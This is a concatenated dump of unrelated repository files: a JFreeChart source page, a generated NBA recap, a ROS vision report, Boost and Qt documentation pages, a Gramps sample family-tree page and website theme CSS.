class="sourceLineNo">012</span> * (at your option) any later version.<a name="line.12"></a> <span class="sourceLineNo">013</span> *<a name="line.13"></a> <span class="sourceLineNo">014</span> * This library is distributed in the hope that it will be useful, but<a name="line.14"></a> <span class="sourceLineNo">015</span> * WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY<a name="line.15"></a> <span class="sourceLineNo">016</span> * or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public<a name="line.16"></a> <span class="sourceLineNo">017</span> * License for more details.<a name="line.17"></a> <span class="sourceLineNo">018</span> *<a name="line.18"></a> <span class="sourceLineNo">019</span> * You should have received a copy of the GNU Lesser General Public<a name="line.19"></a> <span class="sourceLineNo">020</span> * License along with this library; if not, write to the Free Software<a name="line.20"></a> <span class="sourceLineNo">021</span> * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,<a name="line.21"></a> <span class="sourceLineNo">022</span> * USA.<a name="line.22"></a> <span class="sourceLineNo">023</span> *<a name="line.23"></a> <span class="sourceLineNo">024</span> * [Oracle and Java are registered trademarks of Oracle and/or its affiliates. <a name="line.24"></a> <span class="sourceLineNo">025</span> * Other names may be trademarks of their respective owners.]<a name="line.25"></a> <span class="sourceLineNo">026</span> *<a name="line.26"></a> <span class="sourceLineNo">027</span> * ----------------<a name="line.27"></a> <span class="sourceLineNo">028</span> * DatasetTags.java<a name="line.28"></a> <span class="sourceLineNo">029</span> * ----------------<a name="line.29"></a> <span class="sourceLineNo">030</span> * (C) Copyright 2003-2008, by Object Refinery Limited and Contributors.<a name="line.30"></a> <span class="sourceLineNo">031</span> *<a name="line.31"></a> <span class="sourceLineNo">032</span> * Original Author: David Gilbert (for Object Refinery Limited);<a name="line.32"></a> <span class="sourceLineNo">033</span> * Contributor(s): -;<a name="line.33"></a> <span class="sourceLineNo">034</span> *<a name="line.34"></a> <span class="sourceLineNo">035</span> * Changes<a name="line.35"></a> <span class="sourceLineNo">036</span> * -------<a name="line.36"></a> <span class="sourceLineNo">037</span> * 23-Jan-2003 : Version 1 (DG);<a name="line.37"></a> <span class="sourceLineNo">038</span> *<a name="line.38"></a> <span class="sourceLineNo">039</span> */<a name="line.39"></a> <span class="sourceLineNo">040</span><a name="line.40"></a> <span class="sourceLineNo">041</span>package org.jfree.data.xml;<a name="line.41"></a> <span class="sourceLineNo">042</span><a name="line.42"></a> <span class="sourceLineNo">043</span>/**<a name="line.43"></a> <span class="sourceLineNo">044</span> * Constants for the tags that identify the elements in the XML files.<a name="line.44"></a> <span class="sourceLineNo">045</span> */<a name="line.45"></a> <span class="sourceLineNo">046</span>public interface DatasetTags {<a name="line.46"></a> <span class="sourceLineNo">047</span><a name="line.47"></a> <span class="sourceLineNo">048</span> /** The 'PieDataset' element name. */<a name="line.48"></a> <span class="sourceLineNo">049</span> public static final String PIEDATASET_TAG = "PieDataset";<a name="line.49"></a> <span class="sourceLineNo">050</span><a name="line.50"></a> <span class="sourceLineNo">051</span> /** The 'CategoryDataset' element name. */<a name="line.51"></a> <span class="sourceLineNo">052</span> public static final String CATEGORYDATASET_TAG = "CategoryDataset";<a name="line.52"></a> <span class="sourceLineNo">053</span><a name="line.53"></a> <span class="sourceLineNo">054</span> /** The 'Series' element name. */<a name="line.54"></a> <span class="sourceLineNo">055</span> public static final String SERIES_TAG = "Series";<a name="line.55"></a> <span class="sourceLineNo">056</span><a name="line.56"></a> <span class="sourceLineNo">057</span> /** The 'Item' element name. */<a name="line.57"></a> <span class="sourceLineNo">058</span> public static final String ITEM_TAG = "Item";<a name="line.58"></a> <span class="sourceLineNo">059</span><a name="line.59"></a> <span class="sourceLineNo">060</span> /** The 'Key' element name. */<a name="line.60"></a> <span class="sourceLineNo">061</span> public static final String KEY_TAG = "Key";<a name="line.61"></a> <span class="sourceLineNo">062</span><a name="line.62"></a> <span class="sourceLineNo">063</span> /** The 'Value' element name. */<a name="line.63"></a> <span class="sourceLineNo">064</span> public static final String VALUE_TAG = "Value";<a name="line.64"></a> <span class="sourceLineNo">065</span><a name="line.65"></a> <span class="sourceLineNo">066</span>}<a name="line.66"></a> </pre> </div> </body> </html>
web/2014_season/2015022312.html
jacobbustamante/NBANLPRecap
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Clippers lose by 3 against Chris Paul and the Grizzlies, 87-90</title> <link rel="stylesheet" type="text/css" href="../css/style.css"> </head> <body> <h1>Clippers lose by 3 against Chris Paul and the Grizzlies, 87-90</h1> </br> <h2 style="color:gray">by NBANLP Recap Generator</h2> </br></br> <img src="../img/12/01.jpg" alt="No image loaded" align="right" style="height:50%; width:50%;margin-left:20px;margin-bottom:20px;"> <p>Chris Paul contributed well to the Clippers total, recording 26 points. Mike Conley had a great game, scoring 18 points for the Grizzlies. Chris Paul recorded 26 points and 10 assists in a great overall game.</p> <p>Chris made contributions in scoring with 26 points for the Clippers. Paul got 10 assists and 4 rebounds for the Clippers.</p> <p>Mike made contributions in scoring with 18 points for the Grizzlies. Conley contributed 7 assists and 3 rebounds.</p> <p>Chris led the Clippers with 26 points, 10 assists, and 4 rebounds.</p> <p>This result puts Clippers at 37-20 for the season, while the Grizzlies are 41-14. The Grizzlies continue their great streak, winning 2 of 2.</p> <p>Jeff Green and Marc Gasol combined for 26 points. Each scoring 14 and 12 points respectively. Green contributed 2 assists and 6 rebounds for the Grizzlies. Gasol contributed 4 assists and 6 rebounds for the Grizzlies. Zach Randolph put in 7 points. Randolph contributed 2 assists and 10 rebounds for the Grizzlies. Jamal Crawford and DeAndre Jordan totaled 22 points for the Clippers, putting up 15 and 7 points respectively. Crawford contributed 2 assists and 3 rebounds for the Clippers. Jordan recorded 1 assists and 17 rebounds for the Clippers.</p> </body> </html>
catkin_ws/Reports/BOLD_SIFT_1CAN-10fold-10%/old_spice/old_spice7.html
MarcGroef/ros-vision
<!DOCTYPE html> <html> <h1>old_spice7</h1> <p>0/3 correct and 3/3false</p><br> <img src = "../../../BVD_M01/old_spice/old_spice7.jpg" alt = "old_spice7.html" style= " width:320px;height:240px;"> <h1> Falsely compared to: </h1><br> <img src = "../../../BVD_M01/rug_coffee_mug/rug_coffee_mug7.jpg" alt = "BVD_M01/rug_coffee_mug/rug_coffee_mug7.jpg" style= " width:320px;height:240px;"> <img src = "../../../BVD_M01/rug_coffee_mug/rug_coffee_mug7.jpg" alt = "BVD_M01/rug_coffee_mug/rug_coffee_mug7.jpg" style= " width:320px;height:240px;"> <img src = "../../../BVD_M01/rug_coffee_mug/rug_coffee_mug7.jpg" alt = "BVD_M01/rug_coffee_mug/rug_coffee_mug7.jpg" style= " width:320px;height:240px;"> </html>
myodd/boost/libs/log/doc/html/boost/log/expressions/is_keyword_descriptor.html
FFMG/myoddweb.piger
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Struct template is_keyword_descriptor</title> <link rel="stylesheet" href="../../../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="../../../index.html" title="Chapter&#160;1.&#160;Boost.Log v2"> <link rel="up" href="../../../expressions.html#header.boost.log.expressions.is_keyword_descriptor_hpp" title="Header &lt;boost/log/expressions/is_keyword_descriptor.hpp&gt;"> <link rel="prev" href="keyword_descriptor.html" title="Struct keyword_descriptor"> <link rel="next" href="attribute_keyword.html" title="Struct template attribute_keyword"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr><td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../../../boost.png"></td></tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="keyword_descriptor.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../../expressions.html#header.boost.log.expressions.is_keyword_descriptor_hpp"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="attribute_keyword.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="refentry"> <a name="boost.log.expressions.is_keyword_descriptor"></a><div class="titlepage"></div> <div class="refnamediv"> <h2><span class="refentrytitle">Struct template is_keyword_descriptor</span></h2> <p>boost::log::expressions::is_keyword_descriptor</p> </div> <h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2> <div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: &lt;<a class="link" href="../../../expressions.html#header.boost.log.expressions.is_keyword_descriptor_hpp" title="Header &lt;boost/log/expressions/is_keyword_descriptor.hpp&gt;">boost/log/expressions/is_keyword_descriptor.hpp</a>&gt; </span><span class="keyword">template</span><span class="special">&lt;</span><span class="keyword">typename</span> T<span class="special">,</span> <span class="keyword">typename</span> VoidT <span class="special">=</span> <span class="keyword">void</span><span class="special">&gt;</span> <span class="keyword">struct</span> <a class="link" href="is_keyword_descriptor.html" title="Struct template is_keyword_descriptor">is_keyword_descriptor</a> <span class="special">:</span> <span class="keyword">public</span> <span class="identifier">false_</span> <span class="special">{</span> <span class="special">}</span><span class="special">;</span></pre></div> <div class="refsect1"> <a name="idm45848820701360"></a><h2>Description</h2> <p>The metafunction detects if the type <code class="computeroutput">T</code> is a keyword descriptor </p> </div> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2007-2016 Andrey Semashev<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>). </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="keyword_descriptor.html"><img src="../../../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../../expressions.html#header.boost.log.expressions.is_keyword_descriptor_hpp"><img src="../../../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../../../index.html"><img src="../../../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="attribute_keyword.html"><img src="../../../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
gramps42/gramps/example_NAVWEB1/ppl/r/3/GOOKQC6AVMQO31SP3R.html
belissent/testing-example-reports
<!DOCTYPE html> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-US"> <title>My Family Tree - Wong, Jane</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> <link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">My Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li><a href="../../../families.html" title="Families">Families</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../repositories.html" title="Repositories">Repositories</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> <li><a href="../../../addressbook.html" title="Address Book">Address Book</a></li> </ul> </div> </div> <div class="content" id="IndividualDetail"> <h3>Wong, Jane<sup><small> <a href="#sref1">1</a></small></sup></h3> <div id="summaryarea"> <table class="infolist"> <tr> <td class="ColumnAttribute">Birth Name</td> <td class="ColumnValue"> Wong, Jane </td> </tr> <tr> <td class="ColumnAttribute">Gramps&nbsp;ID</td> <td class="ColumnValue">I1600</td> </tr> <tr> <td class="ColumnAttribute">Gender</td> <td class="ColumnValue">female</td> </tr> </table> </div> <div class="subsection" id="families"> <h4>Families</h4> <table class="infolist"> <tr class="BeginFamily"> <td class="ColumnType">&nbsp</td> <td class="ColumnAttribute">&nbsp</td> <td class="ColumnValue"><a href="../../../fam/b/h/AOOKQCKYIBDI1HKGHB.html" title="Family of Benson, Samuel Sr. and Wong, Jane">Family of Benson, Samuel Sr. and Wong, Jane<span class="grampsid"> [F0515]</span></a></td> </tr> <tr class="BeginFamily"> <td class="ColumnType">Married</td> <td class="ColumnAttribute">Husband</td> <td class="ColumnValue"> <a href="../../../ppl/9/y/0OOKQCSCEUA85DM2Y9.html">Benson, Samuel Sr.<span class="grampsid"> [I1599]</span></a> </td> </tr> <tr> <td class="ColumnType">&nbsp;</td> <td class="ColumnAttribute">&nbsp;</td> <td class="ColumnValue"> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> Marriage </td> <td class="ColumnDate">&nbsp;</td> <td class="ColumnPlace">&nbsp;</td> <td class="ColumnDescription"> Marriage of Benson, Samuel Sr. and Wong, Jane </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> </tbody> </table> </td> </tr> </table> </div> <div class="subsection" id="pedigree"> <h4>Pedigree</h4> <ol class="pedigreegen"> <li> <ol> <li class="thisperson"> Wong, Jane <ol class="spouselist"> <li class="spouse"> <a href="../../../ppl/9/y/0OOKQCSCEUA85DM2Y9.html">Benson, Samuel Sr.<span class="grampsid"> [I1599]</span></a> </li> </ol> </li> </ol> </li> </ol> </div> <div class="subsection" id="sourcerefs"> <h4>Source References</h4> <ol> <li> <a href="../../../src/x/a/X5TJQC9JXU4RKT6VAX.html" title="Import from test2.ged" name ="sref1"> Import from test2.ged <span class="grampsid"> [S0003]</span> </a> </li> </ol> </div> </div> <div class="fullclear"></div> <div id="footer"> <p id="createdate"> Generated by <a href="http://gramps-project.org/">Gramps</a> 4.2.2 on 2015-12-25<br />Last change was the 2007-07-26 08:34:25<br />Created for <a href="../../../ppl/h/o/GNUJQCL9MD64AM56OH.html">Garner von Zieliński, Lewis Anderson Sr</a> </p> <p id="copyright"> </p> </div> </body> </html>
core/themes/basis/css/component/footer.css
backdrop-ops/backdrop-pantheon
/** * @file * Site Footer styles. */ .l-footer { margin: 1.5rem 0 0; } .l-footer a { text-decoration: none; } .l-footer a:hover, .l-footer a:focus { text-decoration: underline; } /** * Footer menu styles */ .l-footer .menu, .l-footer .menu li { list-style: none; margin: 0; padding: 0; } .l-footer .menu:after { /* Clearfix menus */ content: ''; display: table; clear: both; } .l-footer .menu > li { float: left; } [dir="rtl"] .l-footer .menu > li { float: right; } .l-footer .menu a { display: block; padding: 0 1rem; } /** * Powered by Backdrop Block */ .l-footer .block-system-powered-by a { text-decoration: none; } .l-footer .block-system-powered-by a:hover { text-decoration: underline; } .drop-lounging { position: relative; /* To make Drop larger/smaller, adjust the width below. */ width: 7em; } .drop-lounging:before { content: ''; position: absolute; top: -0.75em; left: 50%; left: calc(50% + 1.25em); display: none; /* Default hidden unless certain criteria are met */ box-sizing: content-box; width: 100%; height: 0; margin: 0; padding: 0 0 52%; -webkit-transform: translate(-50%, -82%); transform: translate(-50%, -82%); background: url("../../images/drop-lounging.png") no-repeat; background-size: 100% auto; } .l-footer .block:first-child .drop-lounging:before { display: block; }
doc/html/qaxserver-demo-opengl.html
muromec/qtopia-ezx
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Qt 4.3: OpenGL in an HTML page</title> <link href="classic.css" rel="stylesheet" type="text/css" /> </head> <body> <table border="0" cellpadding="0" cellspacing="0" width="100%"> <tr> <td align="left" valign="top" width="32"><a href="http://www.trolltech.com/products/qt"><img src="images/qt-logo.png" align="left" width="32" height="32" border="0" /></a></td> <td width="1">&nbsp;&nbsp;</td><td class="postheader" valign="center"><a href="index.html"><font color="#004faf">Home</font></a>&nbsp;&middot; <a href="classes.html"><font color="#004faf">All&nbsp;Classes</font></a>&nbsp;&middot; <a href="mainclasses.html"><font color="#004faf">Main&nbsp;Classes</font></a>&nbsp;&middot; <a href="groups.html"><font color="#004faf">Grouped&nbsp;Classes</font></a>&nbsp;&middot; <a href="modules.html"><font color="#004faf">Modules</font></a>&nbsp;&middot; <a href="functions.html"><font color="#004faf">Functions</font></a></td> <td align="right" valign="top" width="230"><a href="http://www.trolltech.com"><img src="images/trolltech-logo.png" align="right" width="203" height="32" border="0" /></a></td></tr></table><h1 class="title">OpenGL in an HTML page<br /><span class="subtitle"></span> </h1> <SCRIPT LANGUAGE="JavaScript"> function setRot( form ) { GLBox.setXRotation( form.XEdit.value ); GLBox.setYRotation( form.YEdit.value ); GLBox.setZRotation( form.ZEdit.value ); } </SCRIPT> <p /> An OpenGL scene:<br /> <object ID="GLBox" CLASSID="CLSID:5fd9c22e-ed45-43fa-ba13-1530bb6b03e0" CODEBASE="http://www.trolltech.com/demos/openglax.cab"> [Object not available! Did you forget to build and register the server?] </object><br /> <form> Rotate the scene:<br /> X:<input type="edit" ID="XEdit" value="0" /><br /> Y:<input type="edit" name="YEdit" value="0" /><br /> Z:<input type="edit" name="ZEdit" value="0" /><br /> <input type="button" value="Set" onClick="setRot(this.form)" /> </form> <p /><address><hr /><div align="center"> <table width="100%" cellspacing="0" border="0"><tr class="address"> <td width="30%">Copyright &copy; 2008 <a href="trolltech.html">Trolltech</a></td> <td width="40%" align="center"><a href="trademarks.html">Trademarks</a></td> <td width="30%" align="right"><div align="right">Qt 4.3.6</div></td> </tr></table></div></address></body> </html>
sites/all/themes/advent_basetheme/css/global.css
ApsGitAdmin/GEO-J15782
/* This file will hold styles for the mobile version of your website (mobile first). */ /* This also can include ANY global CSS that applies site-wide. Unless overwritten by a more specific style rule, CSS declarations in global.css will apply site-wide. */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video { margin: 0; padding: 0; border: 0; font-size: 100%; font: inherit; vertical-align: baseline; } /* HTML5 display-role reset for older browsers */ article, aside, details, figcaption, figure, footer, header, hgroup, menu, nav, section { display: block; } ol, ul { list-style: none; } table { border-collapse: collapse; border-spacing: 0; } /* Clear Floated Elements */ .clear { clear:both; display:block; overflow:hidden; visibility:hidden; width:0; height:0; } .clear:after { clear:both; content:' '; display:block; font-size:0; line-height:0; visibility:hidden; width:0; height:0; } * html .clear { height:1%; } /* Style HTML Tags DARK GRAY #555450 LIGHT GRAY #d9d9d9 RED #e51837 */ html { background:#fff; } body { /*background-position-y: 116px;*/ color: #515F5C; font-family: Arial,Helvetica,sans-serif; font-size:12px; line-height:1.62em; padding:0px; background: #fff; } a, a:visited, a:link { color: #e51837; text-decoration:none; } a:hover, a:active, a.active { color: #555450; text-decoration: none; } h1, h2, h3, h4, h5, h6 { color: #d9d9d9; font-family: "Arial", "Helvetica", sans-serif; font-weight: normal; margin-bottom:6px; line-height: 125%; letter-spacing: 1px; } h1 { font-size:28px; } h2 { font-size:24px; } h3 { font-size:18px; } h4 { font-size:16px; } h5 { font-size:15px; } h6 { font-size:14px; } h2.block-title { border-bottom: 2px solid #e51837; font-size: 22px; margin: 0; line-height: 35px; color:#e51837; } article { margin: 0 0 20px 0; } article p { margin: 0 0 10px; color:#d9d9d9; } table { background: none repeat scroll 0 0 rgba(0, 0, 0, 0); border: medium none; border-collapse: collapse; border-spacing: 0; margin-bottom: 20px; width: 100%; } th, tr, td { vertical-align: middle; color: #d9d9d9; padding:5px; } tr { padding-bottom: 0px; } .sticky-header th, .sticky-table th { border-bottom: 3px solid #ccc; padding-right: 1em; text-align: left; } th { background: #dbdbdb; padding: 5px 4px; text-shadow: 1px 1px #fff; color:#333; } td { background: none repeat scroll 0 0 rgba(0, 0, 0, 0); border-bottom: medium none; border-right: medium none; color: #d9d9d9; } code { background: #d8d8d8; text-shadow: 1px 1px #fff; border: 1px solid #bbbbbb; display: block; padding: 7px; margin: 5px 0; border-radius: 7px; } mark { background-color:#fdfc9b; font-style:italic; font-weight:bold; } del { text-decoration: line-through; } hr { border:none; border-top:#EEE 1px solid; } dt { font-weight:bold; margin-bottom:24px; } dd { margin-left:30px; margin-bottom:24px; } ul { list-style-type:disc; margin-left:15px; margin-bottom:12px; } ul ul { list-style-type:square; margin-bottom:0; } ul ul ul { list-style-type:circle; } ol { list-style-type:decimal; margin-left:30px; margin-bottom:24px; } ol ol { list-style: upper-alpha; margin-bottom:0 } ol ol ol { list-style: lower-roman; } ol ol ol ol { list-style: lower-alpha; } p { color:#e51837;} abbr, acronym { border-bottom:#999 1px dotted; cursor:help; } big { font-size:1.3em; } cite, em { font-style:italic; } ins { background-color:#fdfc9b; text-decoration:none; } pre { background: #d8d8d8; text-shadow: 1px 1px #fff; border: 1px solid #bbbbbb; padding: 7px; margin: 5px 0; border-radius: 7px; } blockquote, q { quotes:none; border: 1px solid rgb(226, 220, 220); background: rgb(250, 247, 247) url(images/quote.png) no-repeat; padding: 10px 5px 5px 47px; text-shadow: 1px 1px #fff; margin: 5px 0; border-radius: 7px; } blockquote:before, blockquote:after, q:before, q:after { content:''; content:none; } strong { font-weight:bold; } sup, sub { height:0; line-height:1; vertical-align:baseline; position:relative; font-size:10px; } sup { bottom:1ex; } sub { top:.5ex; } img, video { height:auto; max-width:100%; } video { display:block; } audio { max-width:100%; } .content a img { background:#FFF; max-width:100%; } .content a:hover img { background:#F0F0F0; } /*///////////////////////////////////////////*/ /* CONTENT */ /*///////////////////////////////////////////*/ #page { } #zone-branding { padding-bottom: 0px; } #zone-preface-wrapper { /*background:#e51837;*/ } #zone-branding-wrapper { border-bottom: none; padding-bottom: 20px; } #zone-preface #block-block-1 { padding:20px; background:#e51837; } #region-preface-first { } #block-system-main-menu h2.block-title { display:none; } #block-system-main-menu ul.menu li { font-size: 14px; list-style: none outside none; margin-left: -20px; padding: 0; text-align: left; } #block-system-main-menu ul.menu li.leaf a { color: #e51837; display: block; padding: 10px 0 10px 10px; } #block-system-main-menu ul.menu li.leaf a:hover, #block-system-main-menu ul.menu li.leaf a.active-trail.active { background:#e51837; color:#d9d9d9; } #region-branding-second { } #region-branding-second h2 { font-size: 20px; color:#e51837; } #region-branding-second p { /*color: #fff; display: inline-block; font-size: 28px; line-height: normal; margin: 0; vertical-align: middle; */ margin:0; } #region-branding-second p.line1 { color:#e51837; } #region-branding-second p.line2 {} #region-sidebar-second .block { margin-bottom: 20px; } #region-sidebar-second.block p { margin-bottom:0; } #region-sidebar-second .block img { display:none; } #region-preface-second p { margin:0; } #zone-postscript .block, #region-preface-second .block { background:#d9d9d9; padding:20px; } #zone-postscript .block p, #region-preface-second .block p { color:#555450; } .grid-6.region-preface-third { background: none repeat scroll 0 0 #e51837; margin-right: 0; padding-right: 10px; } .block-main-menu { color:#e51837; } .logo-img { width: 100%; margin-top: 10px; } #region-content { color:#e51837; background:#e51837; display: block; padding: 10px; margin-bottom:20px; /*background: none repeat scroll 0 0 rgba(255, 255, 255, 0.6);*/ /*background: #afc0cc; background: -moz-linear-gradient(top, #afc0cc 0%, #dee4e8 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#afc0cc), color-stop(100%,#dee4e8)); / background: -webkit-linear-gradient(top, #afc0cc 0%,#dee4e8 100%); background: -o-linear-gradient(top, #afc0cc 0%,#dee4e8 100%); background: -ms-linear-gradient(top, #afc0cc 0%,#dee4e8 100%); background: linear-gradient(to bottom, #afc0cc 0%,#dee4e8 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#afc0cc', endColorstr='#dee4e8',GradientType=0 ); */ } .page-user #region-content { background: #d9d9d9; } #region-content.content p { color: #d9d9d9; } #region-content.content p a img { } #zone-content-wrapper { } #zone-content { } #region-sidebar-first { margin-bottom: 20px; } #region-sidebar-second { } #region-preface-second { margin-top:20px; } h3.fp { float: left; margin: 10px 0 10px 10px; font-size:24px; } .fp-img { clear: both; display: block; float: left; margin: 0 10px 10px 0; } .fp-link { float: left; font-size:14px; margin: 0 10px 10px; } .field-name-body { margin-bottom:20px; } article h2 { border-bottom: 2px solid #d9d9d9; color: #d9d9d9; font-size: 28px; font-weight: bold; margin: 0px 0px 20px 0; } .node-type-article article { padding:10px; } article .field-type-image img { float:left; width:100%; margin-bottom:10px; } footer.submitted { font-style:italic; color:#e51837; } .node-type-article article h2 { border-bottom: 2px solid #e51837; margin-bottom: 10px; margin-left: 0; margin-right: 0; } .page-node-1 #region-content h1#page-title, .page-node-1 #region-content article h2 { display:none; } #region-postscript-second { float: right; margin:0 10px 0 10px; } .page-node-1 #region-postscript-second { display:none; } /*FP TITLE BLOCK*/ #block-block-15 { background: #e51837; padding: 20px; } #block-block-15 h1 { color:#d9d9d9; border-bottom:2px solid #d9d9d9; } #block-block-15 h2 { color:#d9d9d9; } #block-block-15 p { color: #d9d9d9; font-size: 16px; font-weight: lighter; line-height: 24px; } #block-block-15 img { width: 100%; margin:5px 0 0 0; } .black { color: #000; } #block-user-login { background:#d9d9d9; padding: 20px; margin:10px; } #zone-footer .block { padding:0; } /*///////////////////////////////////////////*/ /* WEBFORMS */ /*///////////////////////////////////////////*/ article#node-webform-10 { margin:0; } #block-webform-client-block-9 h2 { display:none; } #block-webform-client-block-9 { padding-top: 0; } #block-webform-client-block-10 header, #block-webform-client-block-10 footer.submitted { display:none; } #block-webform-client-block-10 .field-name-body { margin-bottom: 0px; } #block-webform-client-block-10 h2 { color:#fff; margin-left:0; margin-bottom:5px; } #block-webform-client-block-10 .field-name-body p { color:#fff; } #block-webform-client-block-9 #webform-component-message textarea { /*resize:none;*/ } .pop-out a, a.pop-out, button, input[type="reset"], input[type="submit"], input[type="button"] { -webkit-appearance: none; /*-moz-border-radius: 11px; -webkit-border-radius: 11px;*/ -moz-background-clip: padding; -webkit-background-clip: padding; background-clip: padding-box; border-radius: 0; background: #e51837; border: none; border-color: none; cursor: pointer; color: #fff; outline: 0; overflow: visible; padding: 3px 10px 4px; text-shadow: none; width: auto; padding: 15px 35px; *padding-top: 2px; /* IE7 */ *padding-bottom: 0px; /* IE7 */ } .page-user #edit-submit, .page-search .form-submit, #question-node-form input[type="submit"] { color: #e51837; background:#d9d9d9; margin: 20px 0; } .watch-live a:hover, .pop-out a:hover, .form-actions input:hover { background: #d9d9d9; color: #e51837; } #edit-submit--2.form-submit { background:#d9d9d9; color:#e51837; } .input-text, .form-autocomplete, .form-text, .form-textarea, .form-select { border: 1px solid #ccc; box-shadow: 1px 1px 4px rgba(0, 0, 0, 0.37) inset; color: #e51837; font-family: arial; font-size: 14px; line-height: 1.37143em; padding: 2px 3px; width: 100%; } textarea, select, input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"] { color:#e51837; } form { margin-bottom: 20px; } label { color:#d9d9d9; font-size: 14px; } #user-pass label, #user-login label, .page-node-1 label { color: #e51837; } #user-login .marker, .form-required { color: #e51837; } #user-register-form .marker, #user-register-form .form-required, #user-register-form label { color:#e51837; } #node-webform-10 .form-item { } #block-search-form .form-text { margin-bottom: 20px; color:#e51837; } #edit-submitted-your-full-name { color:#e51837; } .form-actions { margin-top:20px; } #block-webform-client-block-10 h2.block-title { font-size: 32px; line-height: 24px; margin-bottom: 10px; color:#fff; } /*///////////////////////////////////////////*/ /* MOBILE MENU */ /*///////////////////////////////////////////*/ #collapsed-menu-button { background: none repeat scroll 0 0 #e51837; border: medium none; border-radius: 0; color: white; display: block; margin: 0; padding: 5px 0 7px; text-align: center; width: 100%; } /*///////////////////////////////////////////*/ /* FACULTY VIEW */ /*///////////////////////////////////////////*/ td.col-1.col-first.grid-4, td.col-2.col-last.grid-4 { width: 20%; } #block-views-faculty-members-faculty h2 { font-size: 26px; margin: 10px 0 20px 10px; } .views-field.views-field-field-photo { width:100% } .views-field.views-field-field-photo img { width:100% } .views-field.views-field-title { border-bottom: 2px solid #e51837; font-size: 20px; padding-bottom: 5px; } .views-field-field-abstract-by, .field-name-field-job-title, .views-field-field-job-title { color:#e51837; font-size:14px; } .field-name-field-location, .views-field-field-location { color:#e51837; font-style:italic; float:left; margin-right: 2px; } .field-name-field-country, .views-field-field-country { color:#e51837; } .field-name-field-abstract-by { color:#e51837; font-style:italic; margin-bottom:20px; } .views-field-field-abstract-by { color:#e51837; font-size:14px; margin:5px 0; } .field-name-field-references p { font-size:11px; } .pager li.pager-current { background: none repeat scroll 0 0 rgba(0, 0, 0, 0); color: #e51837; outline: 0 none; border:none; margin: 0 20px; } .pager { background: none repeat scroll 0 0 